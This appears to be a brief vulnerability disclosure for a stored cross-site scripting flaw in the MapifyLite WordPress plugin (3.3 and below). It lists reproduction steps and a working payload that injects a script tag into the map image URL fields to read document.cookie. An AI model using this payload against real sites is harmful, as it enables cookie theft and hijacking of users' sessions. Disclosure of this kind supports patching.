WordPress MapifyLife plugin versions 3.3 and below suffer from a persistent cross site scripting vulnerability.
12998cba1b9d742b2679ff6fcef76da7
#Title : MapifyLite Wordpress Plugins Stored XSS Injection
#Date : 24/03/2021
#Author : Eagle Eye
#Vendor Homepage : https://mapifypro.com/product/mapifylite/
#Version Affected : 3.3 and below
#Tested on : Google Chrome
#XSS vulnerability from Map settings & locations
#1. Login user
#2. Go to add map settins/locations
#3. Put XSS payload at image pin url / image gallery url
#payload
http://localhost/"><script>alert(document.cookie)</script>